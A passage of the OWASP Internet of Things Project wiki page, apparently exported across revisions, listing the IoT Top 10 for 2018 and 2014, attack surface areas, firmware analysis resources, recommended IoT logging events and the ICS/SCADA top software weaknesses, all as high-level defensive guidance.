* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ICS/SCADA =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246184OWASP Internet of Things Project2018-12-19T23:53:17Z<p>Aaron.guzman: /* Project Leaders */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the 2018 OWASP IoT Top 10.<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
Vishruta Rudresh<br />
<br />
Vijayamurugan Pushpanathan Aaron Guzman <br />
<br />
Alexander Lafrenz <br />
<br />
Masahiro Murashima <br />
<br />
Charlie Worrell <br />
<br />
José A. Rivas (jarv) <br />
<br />
Pablo Endres <br />
<br />
Ade Yoseman <br />
<br />
Cédric LEVY-BENCHEOTN Jason Andress<br />
<br />
Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
